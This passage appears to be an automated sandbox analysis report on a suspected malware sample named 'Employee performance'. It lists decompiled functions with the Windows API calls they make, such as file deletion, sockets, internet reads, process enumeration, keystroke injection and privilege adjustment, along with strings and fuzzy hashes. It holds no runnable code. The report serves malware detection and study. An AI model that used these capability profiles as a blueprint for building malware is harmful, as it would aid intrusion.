Instruction Fuzzy Hash: DEC12579904209AFFB239F6C8850BEEBBF8EF46210F1441AAD9D4D72C5EB319A41C750

Function 0103D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FD3A97,?,?,00FD2E7F,?,?,?,00000000), ref: 00FD3AC2

Part of subcall function 0103E199: GetFileAttributesW.KERNEL32(?,0103CF95), ref: 0103E19A

FindFirstFileW.KERNEL32(?,?), ref: 0103D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 0103D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 0103D481
FindClose.KERNEL32(00000000), ref: 0103D498
FindClose.KERNEL32(00000000), ref: 0103D4A1

Strings

\*.*, xrefs: 0103D3F2

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 642066ebba6c1707c525a0e53e183fd752b39e0f8f5c97d5435ba314c550e5ce
Instruction ID: f8a2c329f6c347e5d1c3292750eedae073c95b678d16646283525312ea0b205c
Opcode Fuzzy Hash: 642066ebba6c1707c525a0e53e183fd752b39e0f8f5c97d5435ba314c550e5ce
Instruction Fuzzy Hash: 553180710083419BC311EFA4D9918EFB7EDAE91304F884A1EF4D593291EB29AA09D763

Function 0100E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0100E645

Strings

1#INF, xrefs: 0100F852
1#IND, xrefs: 0100F83D
1#SNAN, xrefs: 0100F844
1#QNAN, xrefs: 0100F84B

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 8645c4c026ade8bb86fcab9077ade6cbf3269ae5d4e726b4c2ac3319c353c8fa
Instruction ID: 01aa5b001b67852e293d4770672c739603a912062382d8945df2a8df8f19695e
Opcode Fuzzy Hash: 8645c4c026ade8bb86fcab9077ade6cbf3269ae5d4e726b4c2ac3319c353c8fa
Instruction Fuzzy Hash: 54C25B71E046298FEB76CE28DD407EAB7B5EB44304F1445EAD58DE7281E778AE818F40

Function 0104648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 010464DC
CoInitialize.OLE32(00000000), ref: 01046639
CoCreateInstance.OLE32(0106FCF8,00000000,00000001,0106FB68,?), ref: 01046650
CoUninitialize.OLE32 ref: 010468D4

Strings

.lnk, xrefs: 010464BA, 01046524, 010465E0

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 770ff7b04fa12457afd9275f8d781dc196aa5a72acb6287cc458275b8fb9dd2c
Instruction ID: a3e33251b70a73d90e4e002b2839a3dc012b42eb9f9258247a73c9c30c2a09be
Opcode Fuzzy Hash: 770ff7b04fa12457afd9275f8d781dc196aa5a72acb6287cc458275b8fb9dd2c
Instruction Fuzzy Hash: 7ED16AB1508301AFD310EF24C88196BB7E9FF89704F44496DF5958B2A1EB71E905CBA2

Function 01049B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD9CB3: _wcslen.LIBCMT ref: 00FD9CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 01049B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 01049C8B

Part of subcall function 01043874: GetInputState.USER32 ref: 010438CB
Part of subcall function 01043874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 01043966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 01049BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 01049C75

Strings

*.*, xrefs: 01049B5D

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: b534d96892717337a7fb92a004027f068efdd58263be26c9114206c85ec17b51
Instruction ID: 3ed46a6230afd2151efb2499bec2f99cb6a902b37ae10ceacc6ebae57e08e29b
Opcode Fuzzy Hash: b534d96892717337a7fb92a004027f068efdd58263be26c9114206c85ec17b51
Instruction Fuzzy Hash: 6741B1B190020E9FDF54DFA4C985AEE7BF8EF09304F1440B6E985A2290EB319E44CF64

Function 00FE997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 00FE9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FE9BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 00FE9A4E
GetSysColor.USER32(0000000F), ref: 00FE9B23
SetBkColor.GDI32(?,00000000), ref: 00FE9B36

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: c9e7560634d675298f5bb6e60cc5bc140cfc63612620c679b50f42c7da806d23
Instruction ID: 50fe7357a8a512e8e93114149e42e3a1089d47edc89b2529df5cf4f490a4f851
Opcode Fuzzy Hash: c9e7560634d675298f5bb6e60cc5bc140cfc63612620c679b50f42c7da806d23
Instruction Fuzzy Hash: 35A14D7110C5A0BEF7389A3E8C48EBF3A9DEF56714F144119F182C6685CAB98D01E371

Function 01051806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0105304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0105307A
Part of subcall function 0105304E: _wcslen.LIBCMT ref: 0105309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0105185D
WSAGetLastError.WSOCK32 ref: 01051884
bind.WSOCK32(00000000,?,00000010), ref: 010518DB
WSAGetLastError.WSOCK32 ref: 010518E6
closesocket.WSOCK32(00000000), ref: 01051915

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 7fb4898a1d0427d8872c53030e9722397f912825c708b3b8d81768075b5f00c2
Instruction ID: 61f91d1e300eb151520e5d8140a8bcb67db5c724ceb241338f05f4720b2ac74d
Opcode Fuzzy Hash: 7fb4898a1d0427d8872c53030e9722397f912825c708b3b8d81768075b5f00c2
Instruction Fuzzy Hash: 9751B471A00200AFEB20EF24C886F6A77E5AB44718F088099F9459F3C7D779AD41CBE1

Function 0104CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0104CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 0104CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,0104C21E,00000000), ref: 0104CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,0104C21E,00000000), ref: 0104CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,0104C21E,00000000), ref: 0104CFF2

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 29a634b894838fe6b6b8ef0819a214663a7c4e79fbb4d0829e4f7dbda1bd7a64
Instruction ID: b086ef5dfcb26dfb66ec7399bad82915cdb9e3a546caa9321f874dd2907b71ea
Opcode Fuzzy Hash: 29a634b894838fe6b6b8ef0819a214663a7c4e79fbb4d0829e4f7dbda1bd7a64
Instruction Fuzzy Hash: 53317FB1601205AFFB20DFA9CAC4AAFBBF8EF14210B10447EF586D2101D739AA419B60

Function 01061C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 01061CC0
IsWindowEnabled.USER32 ref: 01061CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 01061CDB
IsIconic.USER32 ref: 01061CE9
IsZoomed.USER32 ref: 01061CF7

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 3e56b25972ef08b2e1a490719495e14bb93a715c99d24ea4261d62b07183b578
Instruction ID: ebf2981708eebd97008696d552f99e13faef89fdffe65a7c345b7ad25a8b491e
Opcode Fuzzy Hash: 3e56b25972ef08b2e1a490719495e14bb93a715c99d24ea4261d62b07183b578
Instruction Fuzzy Hash: E321A3317002055FE7609F1AC844B6E7BE9EFD9325F1980A9E8C6CB355CB76E842CB90

Function 00FD8060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00FD83FA
VUUU, xrefs: 00FD83E8
ERCP, xrefs: 00FD813C
VUUU, xrefs: 00FD843C
VUUU, xrefs: 01015DF0

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 192ba38198a8c9cb1e85ce42f9d698afb3c011f5dee5118c574f066f44e5d7c2
Instruction ID: fd783ea7e3aa4f714c8c15afa0282784ae64bfd26ab31c23cb88333f00fc1a15
Opcode Fuzzy Hash: 192ba38198a8c9cb1e85ce42f9d698afb3c011f5dee5118c574f066f44e5d7c2
Instruction Fuzzy Hash: F2A26071E0021ACBDF25CF58C8407AEB7B2BF44354F28819AE855AB389DB759D82DF50

Function 0105A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0105A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0105A6BA

Part of subcall function 00FD9CB3: _wcslen.LIBCMT ref: 00FD9CBD

Process32NextW.KERNEL32(00000000,?), ref: 0105A79C
CloseHandle.KERNEL32(00000000), ref: 0105A7AB

Part of subcall function 00FECE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,01013303,?), ref: 00FECE8A

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 0134ed03907329b230d0cead5f463b0dbb87e5077c70e2ed14c742fb97f6c781
Instruction ID: fc991e07acde005aba084862bffa114540eb76c8dd8c06c6d3b8c0b66457e0b8
Opcode Fuzzy Hash: 0134ed03907329b230d0cead5f463b0dbb87e5077c70e2ed14c742fb97f6c781
Instruction Fuzzy Hash: 52518C71608300AFD710EF24CC85A6BBBE9FF89714F04891EF98597291EB34D904DB92

Function 0103AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 0103ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 0103AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 0103AC74
SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 0103ACC6

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 193165305aa3b43e39188de519a2615257efd2876c212a6602e79eb8c4d7d178
Instruction ID: 9dd1878bdabc5d9ed73ff7b1dc56508a41f4d07f91573ae32e669b6efcb5c30c
Opcode Fuzzy Hash: 193165305aa3b43e39188de519a2615257efd2876c212a6602e79eb8c4d7d178
Instruction Fuzzy Hash: F331E330B2461CEFFB358A6988087FE7AADABC9320F08425AE4C5D71D1C37989858B51

Function 01038298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 010382AA

Strings

(, xrefs: 010382F0
|, xrefs: 010382DA

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 18ad50c1657b1f26605c28a4ac2471726a83cb7f60ed71be9acfeba33147b4b1
Instruction ID: 3738ef1e401efcb0a3ce044447e9a183072cdbd71548fd124967628aac65165d
Opcode Fuzzy Hash: 18ad50c1657b1f26605c28a4ac2471726a83cb7f60ed71be9acfeba33147b4b1
Instruction Fuzzy Hash: 21322575A006059FDB28CF69C480A6AB7F5FF88310B15C5AEE59ADB3A1E770E941CB40

Function 01045C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 01045CC1
FindNextFileW.KERNEL32(00000000,?), ref: 01045D17
FindClose.KERNEL32(?), ref: 01045D5F

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: f3305cc5143db0a347c9507ce3092a95c938d8442e92aa6c2fe9cec887e0ff9e
Instruction ID: 449fb7bc8f65adadd29aafe9ee658e15228dae67a86d2c9f4ba653a94ccad7e9
Opcode Fuzzy Hash: f3305cc5143db0a347c9507ce3092a95c938d8442e92aa6c2fe9cec887e0ff9e
Instruction Fuzzy Hash: F151AD746046019FD724DF28C8D4A9AB7E4FF49314F1485AEE99A8B3A2CB34E905CB91

Function 01002622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0100271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01002724
UnhandledExceptionFilter.KERNEL32(?), ref: 01002731

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 68c5080cd64def85ba0612e18e2e0994427c7958af4e46bce5ace890e79fdb7b
Instruction ID: e92bec0c1fb3faf21c503902753ac48cea94c07c993f014aafdfa27a68dd1101
Opcode Fuzzy Hash: 68c5080cd64def85ba0612e18e2e0994427c7958af4e46bce5ace890e79fdb7b
Instruction Fuzzy Hash: 9B31D67491122C9BDB61DF68DD887DCBBB8BF08310F5041EAE94CA7261EB749B818F44

Function 010451CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 010451DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 01045238
SetErrorMode.KERNEL32(00000000), ref: 010452A1

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: ec2eae5b0fab865c891787b37efc1c73b83e8fe76f3affd69aca3efbb8fe6423
Instruction ID: 5ed4d6fe5819f208ea5802754aca3d7c655328ab165b85b238b606712e0ee09a
Opcode Fuzzy Hash: ec2eae5b0fab865c891787b37efc1c73b83e8fe76f3affd69aca3efbb8fe6423
Instruction Fuzzy Hash: 18316B75A00109DFDB00DF94D884EADBBB5FF49314F08809AE845AB356DB36E845CBA0

Function 010316C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00FEFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00FF0668
Part of subcall function 00FEFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00FF0685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0103170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0103173A
GetLastError.KERNEL32 ref: 0103174A

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 2a4242ad1952b20da8fc139a43cff9c1e5d9fd6935b7dd92a422749179300082
Instruction ID: f964b78c303dbee9335a1beda1e03718c44e122da94b89684b45e6fe405e8af9
Opcode Fuzzy Hash: 2a4242ad1952b20da8fc139a43cff9c1e5d9fd6935b7dd92a422749179300082
Instruction Fuzzy Hash: 4211C1B2404305AFE7289F54DC86D6ABBFDFB48754B24852EF09653241EB75BC428B20

Function 0103D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0103D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0103D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0103D650

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 4bd35dd99f60740a3a61c32ba26c9daf40a86caffeb58cbf74624a028db5296f
Instruction ID: 8d801ab79489189a67e4651672e8530663e5453eae8e1d0a26dfcc5e7899954f
Opcode Fuzzy Hash: 4bd35dd99f60740a3a61c32ba26c9daf40a86caffeb58cbf74624a028db5296f
Instruction Fuzzy Hash: 59118E71E01228BFEB208F99DC44FAFBFBCEB89B50F108151F954E7290C2704A058BA1

Function 01031663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0103168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 010316A1
FreeSid.ADVAPI32(?), ref: 010316B1

Memory Dump Source

